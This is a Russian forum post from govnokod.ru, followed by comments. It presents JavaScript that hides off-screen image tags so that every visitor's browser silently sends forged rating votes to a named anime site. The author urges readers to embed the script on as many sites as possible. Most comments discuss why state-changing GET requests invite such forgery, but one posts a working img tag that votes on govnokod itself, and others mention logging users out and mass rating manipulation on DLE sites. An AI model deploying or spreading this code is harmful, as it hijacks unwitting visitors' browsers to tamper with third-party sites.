1. JavaScript / Говнокод #26542

    +1

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    <script>
        document.addEventListener('DOMContentLoaded', function() {
          for(let i=1; i<50; i++) {
            let num = getRandomIntInclusive(1, 4447);
          	let img = document.createElement('img');
            let img2 = document.createElement('img');
            let img3 = document.createElement('img');
          	img.src = 'https://animebest.org/engine/ajax/m_rating.php?news_id='+num+'&area=video&go_rate=1';
            img2.src = 'https://animebest.org/engine/ajax/m_rating.php?news_id='+num+'&area=gameplay&go_rate=1';
            img3.src = 'https://animebest.org/engine/ajax/m_rating.php?news_id='+num+'&area=sound&go_rate=1';
            img.style.position = img2.style.position = img3.style.position = 'fixed';
            img.style.top = img2.style.top = img3.style.top = '-50000px';
            document.body.append(img);
            document.body.append(img2);
            document.body.append(img3);
          }
        });
        function getRandomIntInclusive(min, max) {
          min = Math.ceil(min);
          max = Math.floor(max);
          return Math.floor(Math.random() * (max - min + 1)) + min;
        }
      </script>

    Ахуенный код чтобпоказать админам что они долбоёбы и нехуй юзать get pапросы!
    Поставил на несколько своих сайтов где по 300-400 просмотров в месяц. Но я также нуждаюсь в вашей поддержке, ставьте его везде где только можно!
    Не палится ддосом если запускать раз в пару минут!! По моим подсчётам через год у них будут в минусе все аниме
    Но если вы поддержите меня то это случится даже быстрееееееее

    Запостил: codershitter, 30 Марта 2020

    Комментарии (35) RSS

    • что за сайт? И что с ним случится после такого?
      Ответить
    • > нехуй юзать get pапросы
      Не понял, а чем ситуация отличается от использования POST-запросов?
      Только тем, что товагищь codershitter не умеет отправлять POST-запросы?
      Чем питухсайт, не пользующийся CSRF токенами, будет лучше, если перейдёт, скажем, с GET на POST?
      Ответить
      • На POST-запрос нельзя оставить ссылку на говносайте типа «Вконтактика». Для POST-запроса нужно собирать форму в «HTML».
        Ответить
        • А букмарклет можно оставить? Или ссылку на свой питух-сайт, при открытие которой выполняется небольшой сукурипту?
          Ответить
          • Можно. Но ограничение запросов типом POST отсеет анскильных питухов, у которых нет возможности создать свой питух-сайт, и поисковых ботов.
            Ответить
            • Что интересно, автор поста пока ещё собирает армию скильных питухов-владельцев сайтов.
              Его пока ещё не посетило разочарование в отсутствие желающих поместить питух-код на свой сайт, тема с распространия кодов для вставки картинок им пока ещё не разработана.
              Ответить
      • Тем, что для GET'а достаточно запостить куда-нибудь картинку с нужным урлом. А для поста всё-таки придётся попердолиться.
        Ответить
    • Кстати, на гк голосувание тоже гет-забросами.

      Гост с иинху могут посчитать сколько залогиненых на гк пользователей используют их саеты.

      <img src="http://govnokod.ru/ratings/code/26542/on"></img>
      Ответить
      • Ещё можно разлогинить пользователя.

        Хорошо хоть комменты get'ами не шлются.
        Ответить
        • Логаут тоже гетом?
          Ответить
          • Не в системе, а на гк.
            Ответить
            • > в системе

              Ну это совсем багор был бы ;)
              Ответить
              • )))

                Кстати, у вебморд для настроек вроутеров и мудемов бывают какие нибудь настройки которые выставляются гет-запросами? Это был бы реальный богор.
                Ответить
                • > багор

                  Да там и от поста будет багор...
                  Ответить
                  • Багром изогнётся кривая на осциллоскопе, вслед за чем ты отправишься в трубу - кодить на воображаемых сях.
                    Ответить
                  • именно по этому я против "вебморды"
                    Ответить
      • Так ещё можно узнать, что (не)нравится пользователю.

        Короче, кто использует гет не только для выдачи общедоступного контента должен гореть ваду.
        Ответить
        • > узнать

          Оно ошибку возвращает если уже проголосовано?
          Ответить
          • Можно скриптом сравнить количество голых сов до запроса и сразу после.

            Насчёт того что возвращает не знаю, надо за комп садистя и проверять, но у меня сопля бежит, да и влом как-то.
            Ответить
      • vanished
        Ответить
        • Хлорсодержащие средства не действуют на вирусы, мой наивный кормитель.
          Ответить
      • себе всегда ставлю плюс
        Ответить
    • А в чем проблема гет запросов ? Чем они хуже постов ?
      Ответить
      • тем, что их можно повторять безопасгно
        Ответить
      • «GET»-запросы не должны влиять на состояние сервера. Нецензурно выражаясь, они должны быть идемпотентными (возвращающими на один и тот же запрос один и тот же результат, разумеется, с учётом изменения данных на сервере). В первую очередь это нужно потому, что браузер при загрузке страницы может послать несколько одинаковых GET-запросов (например, если в этот момент лагнул интернет). Во вторую — потому что GET-запросы можно создавать просто вставкой ссылок на соответствующие URL (в частности, по ним могут ходить поисковые боты, их можно вставить в какие-нибудь «Гуглотаблицы» и получить дудос).
        Ответить
        • ╔══════════════════════════════════════╗
          ║ Ответ уёбку успешно зарегистрирован. ║
          ╚══════════════════════════════════════╝
          Ответить
        • ахаха, бивис. Он сказал "идемпотентными "
          Ответить
          • Не бивис, а Бревис. "Вита бревис", как говорил мой хозяин--китаец, патологоанатом. Самое время, чтобы поразмыслить над этим.
            Ответить
        • Так и что ? Ну придет два запроса на логаут, первый пройдет, второй не пройдет валидацию. В чем проблема, какой ддос ?
          Ответить
          • Запрос на логаут - возможно, редкая питушня, когда первый запрос отменяет остальные.
            Могут существовать повторяемые запросы с побочными эффектами. Скажем, запрос "послать письмо" или "задонатить 1 единицу валюты". Чтобы реализовать из через GET, необходимо ввести одноразовые токены (не просто токен на сессию, как можно делать в остальных случаях, а уникальные для каждого запроса).
            Ответить
    • Так это ж олдскульный варезный движок DLE! Он не только у анимешников, но и на куче других сайтов стоит, так что можно скручивать рейтинги массово!
      Ответить

    Добавить комментарий